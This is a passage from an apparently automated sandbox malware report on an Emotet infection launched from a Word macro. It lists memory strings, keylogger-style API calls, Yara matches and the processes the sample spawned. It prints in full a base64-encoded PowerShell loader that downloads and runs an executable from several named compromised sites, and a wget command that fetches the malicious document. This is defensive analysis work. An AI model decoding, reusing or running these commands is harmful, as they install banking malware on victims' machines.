Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://settings.outlook.com
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://shell.suite.office.com:1443
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://store.office.com/addinstemplate
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://store.office.de/addinstemplate
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://tasks.office.com
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://wus2-000.contentsync.
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://wus2-000.pagecontentsync.
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://www.odwebp.svc.ms

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)Show sources
Source: 879.exe, 0000000C.00000002.2126942233.000000000083A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Potential key logger detected (key state polling based)Show sources
Source: C:\Users\user\879.exeCode function: 12_2_0041C023 GetKeyState,GetKeyState,GetKeyState,GetKeyState,12_2_0041C023
Source: C:\Users\user\879.exeCode function: 12_2_00416206 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,12_2_00416206
Source: C:\Users\user\879.exeCode function: 12_2_0043A602 __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent,12_2_0043A602
Source: C:\Users\user\879.exeCode function: 12_2_00438A32 ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,12_2_00438A32
Source: C:\Users\user\879.exeCode function: 12_2_0042D5F7 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,12_2_0042D5F7
Source: C:\Users\user\879.exeCode function: 12_2_00437723 GetKeyState,GetKeyState,GetKeyState,12_2_00437723
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_0041C023 GetKeyState,GetKeyState,GetKeyState,GetKeyState,13_2_0041C023
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_00416206 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,13_2_00416206
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_0043A602 __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent,13_2_0043A602
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_00438A32 ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,13_2_00438A32
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_0042D5F7 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,13_2_0042D5F7
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_00437723 GetKeyState,GetKeyState,GetKeyState,13_2_00437723

E-Banking Fraud:

barindex
Malicious encrypted Powershell command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powersheLL -e JABFAHYAaQB6AGsAbAByAGwAPQAnAFoAcAB4AGwAbQBwAGoAZQBzAGYAdQAnADsAJABOAGEAegBjAHkAagB0AGIAdABiAGgAdwBqACAAPQAgACcAOAA3ADkAJwA7ACQAUABqAGkAZwB6AGcAeQBpAHUAawB4AHYAegA9ACcATAB2AHAAYgBwAHoAdQB3AHEAaABsAHkAJwA7ACQARABqAGEAYQBvAHUAcwB3AG4AYgByAGgAeQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATgBhAHoAYwB5AGoAdABiAHQAYgBoAHcAagArACcALgBlAHgAZQAnADsAJABXAGkAaABpAGoAawBiAGQAbABsAHIAPQAnAFYAbQBuAHEAcQBrAG0AaABrAGYAdgB4ACcAOwAkAEsAcQB2AGYAbwB4AHkAcABlAHoAPQAmACgAJwBuAGUAdwAnACsAJwAtAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4ARQB0AC4AVwBlAGIAYwBMAEkARQBOAFQAOwAkAEEAbABnAHkAbwB2AHMAbQBuAGkAcgBsAGwAPQAnAGgAdAB0AHAAOgAvAC8AdABhAC0AYgBlAGgAZQBzAGgAdAAuAGkAcgAvAGkAbQBhAGcAZQBzAC8AUAByAG8AdgB4ADAAMABhAC8AKgBoAHQAdABwADoALwAvAHQAYQB0AGMAbwBnAHIAbwB1AHAALgBpAHIALwB3AHAALQBhAGQAbQBpAG4ALwBVAEMALwAqAGgAdAB0AHAAOgAvAC8AdABjAHAAYQByAHQAbgBlAHIALgByAHUALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBuAHIAOAAvACoAaAB0AHQAcAA6AC8ALwB0AGUAcABjAGkAYQBuAC4AdQB0AGMAYwAuAGEAYwAuAHQAaAAvAHcAcAAtAGEAZABtAGkAbgAvAFMAcQB1AFIALwAqAGgAdAB0AHAAOgAvAC8AbwB1AHIAcAByAG8AZAB1AGMAdAByAGUAdgBpAGUAdwAuAGkAbgAvAHAAbwBrAGoAYgBnADcANAA2AGkAaAByAHQAcgAvAGEAMQBrAHoAdwBjAC8AJwAuACIAcwBQAGAAbABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABNAHIAeQBuAGkAaABxAHgAYwBxAG4AcAA9ACcASABrAGQAawB6AGgAegBrAGMAcgB2ACcAOwBmAG8AcgBlAGEAYwBoACgAJABYAGgAaQBwAHMAdgB3AHAAIABpAG4AIAAkAEEAbABnAHkAbwB2AHMAbQBuAGkAcgBsAGwAKQB7AHQAcgB5AHsAJABLAHEAdgBmAG8AeAB5AHAAZQB6AC4AIgBkAE8AdwBuAEwAYABPAGAAQQBEAEYASQBsAGUAIgAoACQAWABoAGkAcABzAHYAdwBwACwAIAAkAEQAagBhAGEAbwB1AHMAdwBuAGIAcgBoAHkAKQA7ACQASgBtAGMAbABrAGoAcQBwAD0AJwBYAGkAaQBhAHgAawB3AGMAYQB3ACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJACcAKwAnAHQAZQBtACcAKQAgACQARABqAGEAYQBvAHUAcwB3AG4AYgByAGgAeQApAC4AIgBMAGUAYABOAGcAVABoACIAIAAtAGcAZQAgADMANwA0ADMAMgApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAQwBSAEUAYABBAFQAZQAiACgAJABEAGoAYQBhAG8AdQBzAHcAbgBiAHIAaAB5ACkAOwAkAEMAawB4AHMAdQBjAG8AaABzAHQAYwBoAGwAPQAnAEMAZwB4AGEAdgB4AGYAYgByACcAOwBiAHIAZQBhAGsAOwAkAFoAZwBvAHYAcgBoAGoAbQA9ACcATQBxAHYAbgB4AGYAZgBvACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAE0AbAByAHoAdAB6AHYAZQBjAHcAagBnAD0AJwBDAGkAcwB3AGMAdgB4AHkAegBlAHEAcQAnAA==
Yara detected EmotetShow sources
Source: Yara matchFile source: 0000000C.00000002.2126423927.00000000007A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.2421877565.0000000000670000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000C.00000002.2126369833.0000000000790000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.2421897150.0000000000681000.00000020.00000001.sdmp, type: MEMORY

System Summary:

barindex
Powershell drops PE fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\879.exeJump to dropped file
Very long command line foundShow sources
Source: unknownProcess created: Commandline size = 2158
Contains functionality to call native functionsShow sources
Source: C:\Users\user\879.exeCode function: 12_2_004382BB NtdllDefWindowProc_A,GetWindowRect,SetRect,InvalidateRect,SetRect,InvalidateRect,SetRect,SetRect,InvalidateRect,SetRect,InvalidateRect,12_2_004382BB
Source: C:\Users\user\879.exeCode function: 12_2_004165F4 NtdllDefWindowProc_A,12_2_004165F4
Source: C:\Users\user\879.exeCode function: 12_2_00418CF6 __CxxThrowException@8,__snprintf_s,NtdllDefWindowProc_A,12_2_00418CF6
Source: C:\Users\user\879.exeCode function: 12_2_00418D07 __snprintf_s,__snprintf_s,NtdllDefWindowProc_A,12_2_00418D07
Source: C:\Users\user\879.exeCode function: 12_2_00418F60 _memset,NtdllDefWindowProc_A,12_2_00418F60
Source: C:\Users\user\879.exeCode function: 12_2_00413773 NtdllDefWindowProc_A,CallWindowProcA,12_2_00413773
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_004382BB NtdllDefWindowProc_A,GetWindowRect,SetRect,InvalidateRect,SetRect,InvalidateRect,SetRect,SetRect,InvalidateRect,SetRect,InvalidateRect,13_2_004382BB
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_004165F4 NtdllDefWindowProc_A,13_2_004165F4
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_00418CF6 __CxxThrowException@8,__snprintf_s,NtdllDefWindowProc_A,13_2_00418CF6
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_00418D07 __snprintf_s,__snprintf_s,NtdllDefWindowProc_A,13_2_00418D07
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_00418F60 _memset,NtdllDefWindowProc_A,13_2_00418F60
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_00413773 NtdllDefWindowProc_A,CallWindowProcA,13_2_00413773
Creates files inside the system directoryShow sources
Source: C:\Users\user\879.exeFile created: C:\Windows\SysWOW64\LaunchWinApp\Jump to behavior
Detected potential crypto functionShow sources
Source: C:\Users\user\879.exeCode function: 12_2_004180EC12_2_004180EC
Source: C:\Users\user\879.exeCode function: 12_2_0044A12012_2_0044A120
Source: C:\Users\user\879.exeCode function: 12_2_0045E3C312_2_0045E3C3
Source: C:\Users\user\879.exeCode function: 12_2_0043C4F012_2_0043C4F0
Source: C:\Users\user\879.exeCode function: 12_2_0045E63712_2_0045E637
Source: C:\Users\user\879.exeCode function: 12_2_004506A912_2_004506A9
Source: C:\Users\user\879.exeCode function: 12_2_004567B212_2_004567B2
Source: C:\Users\user\879.exeCode function: 12_2_004507BF12_2_004507BF
Source: C:\Users\user\879.exeCode function: 12_2_0045E94112_2_0045E941
Source: C:\Users\user\879.exeCode function: 12_2_0046291212_2_00462912
Source: C:\Users\user\879.exeCode function: 12_2_0044AC9212_2_0044AC92
Source: C:\Users\user\879.exeCode function: 12_2_0043EEA912_2_0043EEA9
Source: C:\Users\user\879.exeCode function: 12_2_0045B02912_2_0045B029
Source: C:\Users\user\879.exeCode function: 12_2_0045F0CB12_2_0045F0CB
Source: C:\Users\user\879.exeCode function: 12_2_0040308012_2_00403080
Source: C:\Users\user\879.exeCode function: 12_2_004531CC12_2_004531CC
Source: C:\Users\user\879.exeCode function: 12_2_0045D2F912_2_0045D2F9
Source: C:\Users\user\879.exeCode function: 12_2_0043F37C12_2_0043F37C
Source: C:\Users\user\879.exeCode function: 12_2_0043F75012_2_0043F750
Source: C:\Users\user\879.exeCode function: 12_2_0045787512_2_00457875
Source: C:\Users\user\879.exeCode function: 12_2_0045D82212_2_0045D822
Source: C:\Users\user\879.exeCode function: 12_2_00457A6212_2_00457A62
Source: C:\Users\user\879.exeCode function: 12_2_0043FB5C12_2_0043FB5C
Source: C:\Users\user\879.exeCode function: 12_2_00445C6F12_2_00445C6F
Source: C:\Users\user\879.exeCode function: 12_2_0045DD6412_2_0045DD64
Source: C:\Users\user\879.exeCode function: 12_2_0044DE6112_2_0044DE61
Source: C:\Users\user\879.exeCode function: 12_2_0043FF7C12_2_0043FF7C
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_004180EC13_2_004180EC
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_0044A12013_2_0044A120
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_0045E3C313_2_0045E3C3
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_0043C4F013_2_0043C4F0
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_0045E63713_2_0045E637
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_004506A913_2_004506A9
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_004567B213_2_004567B2
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_004507BF13_2_004507BF
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_0045E94113_2_0045E941
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_0046291213_2_00462912
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_0044AC9213_2_0044AC92
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_0043EEA913_2_0043EEA9
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_0045B02913_2_0045B029
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_0045F0CB13_2_0045F0CB
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_0040308013_2_00403080
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_004531CC13_2_004531CC
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_0045D2F913_2_0045D2F9
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_0043F37C13_2_0043F37C
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_0043F75013_2_0043F750
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_0045787513_2_00457875
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_0045D82213_2_0045D822
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_00457A6213_2_00457A62
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_0043FB5C13_2_0043FB5C
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_00445C6F13_2_00445C6F
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_0045DD6413_2_0045DD64
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_0044DE6113_2_0044DE61
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_0043FF7C13_2_0043FF7C
Document contains an embedded VBA macro which executes code when the document is opened / closedShow sources
Source: QDC5QK1.doc.2.drOLE, VBA macro line: Private Sub Document_open()
Found potential string decryption / allocating functionsShow sources
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: String function: 0043D624 appears 97 times
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: String function: 0044556E appears 43 times
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: String function: 0041EC48 appears 56 times
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: String function: 0043CA63 appears 201 times
Source: C:\Users\user\879.exeCode function: String function: 0043D624 appears 97 times
Source: C:\Users\user\879.exeCode function: String function: 0044556E appears 43 times
Source: C:\Users\user\879.exeCode function: String function: 0041EC48 appears 56 times
Source: C:\Users\user\879.exeCode function: String function: 0043CA63 appears 201 times
PE file contains strange resourcesShow sources
Source: 879.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 879.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 879.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Yara signature matchShow sources
Source: C:\Users\user\Documents\20200207\PowerShell_transcript.124406.N+qwB_ba.20200207211426.txt, type: DROPPEDMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Classification labelShow sources
Source: classification engineClassification label: mal100.bank.troj.evad.win@10/19@2/6
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\Users\user\879.exeCode function: 12_2_0040C4C0 FindResourceA,LoadResource,FreeResource,12_2_0040C4C0
Creates files inside the user directoryShow sources
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Desktop\cmdline.outJump to behavior
Creates mutexesShow sources
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5328:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4304:120:WilError_01
Creates temporary filesShow sources
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{05FE7762-2413-4F4B-B7EF-7A27ADCA0B77} - OProcSessId.datJump to behavior
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dllJump to behavior
Queries process information (via WMI, Win32_Process)Show sources
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Reads ini filesShow sources
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\SysWOW64\wget.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Reads the hosts fileShow sources
Source: C:\Windows\SysWOW64\wget.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\wget.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Spawns processesShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/' > cmdline.out 2>&1
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/'
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE 'C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE' /n 'C:\Users\user\Desktop\download\QDC5QK1.doc' /o ''
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powersheLL -e JABFAHYAaQB6AGsAbAByAGwAPQAnAFoAcAB4AGwAbQBwAGoAZQBzAGYAdQAnADsAJABOAGEAegBjAHkAagB0AGIAdABiAGgAdwBqACAAPQAgACcAOAA3ADkAJwA7ACQAUABqAGkAZwB6AGcAeQBpAHUAawB4AHYAegA9ACcATAB2AHAAYgBwAHoAdQB3AHEAaABsAHkAJwA7ACQARABqAGEAYQBvAHUAcwB3AG4AYgByAGgAeQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATgBhAHoAYwB5AGoAdABiAHQAYgBoAHcAagArACcALgBlAHgAZQAnADsAJABXAGkAaABpAGoAawBiAGQAbABsAHIAPQAnAFYAbQBuAHEAcQBrAG0AaABrAGYAdgB4ACcAOwAkAEsAcQB2AGYAbwB4AHkAcABlAHoAPQAmACgAJwBuAGUAdwAnACsAJwAtAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4ARQB0AC4AVwBlAGIAYwBMAEkARQBOAFQAOwAkAEEAbABnAHkAbwB2AHMAbQBuAGkAcgBsAGwAPQAnAGgAdAB0AHAAOgAvAC8AdABhAC0AYgBlAGgAZQBzAGgAdAAuAGkAcgAvAGkAbQBhAGcAZQBzAC8AUAByAG8AdgB4ADAAMABhAC8AKgBoAHQAdABwADoALwAvAHQAYQB0AGMAbwBnAHIAbwB1AHAALgBpAHIALwB3AHAALQBhAGQAbQBpAG4ALwBVAEMALwAqAGgAdAB0AHAAOgAvAC8AdABjAHAAYQByAHQAbgBlAHIALgByAHUALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBuAHIAOAAvACoAaAB0AHQAcAA6AC8ALwB0AGUAcABjAGkAYQBuAC4AdQB0AGMAYwAuAGEAYwAuAHQAaAAvAHcAcAAtAGEAZABtAGkAbgAvAFMAcQB1AFIALwAqAGgAdAB0AHAAOgAvAC8AbwB1AHIAcAByAG8AZAB1AGMAdAByAGUAdgBpAGUAdwAuAGkAbgAvAHAAbwBrAGoAYgBnADcANAA2AGkAaAByAHQAcgAvAGEAMQBrAHoAdwBjAC8AJwAuACIAcwBQAGAAbABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABNAHIAeQBuAGkAaABxAHgAYwBxAG4AcAA9ACcASABrAGQAawB6AGgAegBrAGMAcgB2ACcAOwBmAG8AcgBlAGEAYwBoACgAJABYAGgAaQBwAHMAdgB3AHAAIABpAG4AIAAkAEEAbABnAHkAbwB2AHMAbQBuAGkAcgBsAGwAKQB7AHQAcgB5AHsAJABLAHEAdgBmAG8AeAB5AHAAZQB6AC4AIgBkAE8AdwBuAEwAYABPAGAAQQBEAEYASQBsAGUAIgAoACQAWABoAGkAcABzAHYAdwBwACwAIAAkAEQAagBhAGEAbwB1AHMAdwBuAGIAcgBoAHkAKQA7ACQASgBtAGMAbABrAGoAcQBwAD0AJwBYAGkAaQBhAHgAawB3AGMAYQB3ACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJACcAKwAnAHQAZQBtACcAKQAgACQARABqAGEAYQBvAHUAcwB3AG4AYgByAGgAeQApAC4AIgBMAGUAYABOAGcAVABoACIAIAAtAGcAZQAgADMANwA0ADMAMgApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAQwBSAEUAYABBAFQAZQAiACgAJABEAGoAYQBhAG8AdQBzAHcAbgBiAHIAaAB5ACkAOwAkAEMAawB4AHMAdQBjAG8AaABzAHQAYwBoAGwAPQAnAEMAZwB4AGEAdgB4AGYAYgByACcAOwBiAHIAZQBhAGsAOwAkAFoAZwBvAHYAcgBoAGoAbQA9ACcATQBxAHYAbgB4AGYAZgBvACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAE0AbAByAHoAdAB6AHYAZQBjAHcAagBnAD0AJwBDAGkAcwB3AGMAdgB4AHkAegBlAHEAcQAnAA==
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\879.exe C:\Users\user\879.exe
Source: unknownProcess created: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/' Jump to behavior
Source: C:\Users\user\879.exeProcess created: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeJump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\879.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Executable creates window controls seldom found in malwareShow sources
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEWindow found: window name: SysTabControl32Jump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeJump to behavior
Uses new MSVCR DllsShow sources
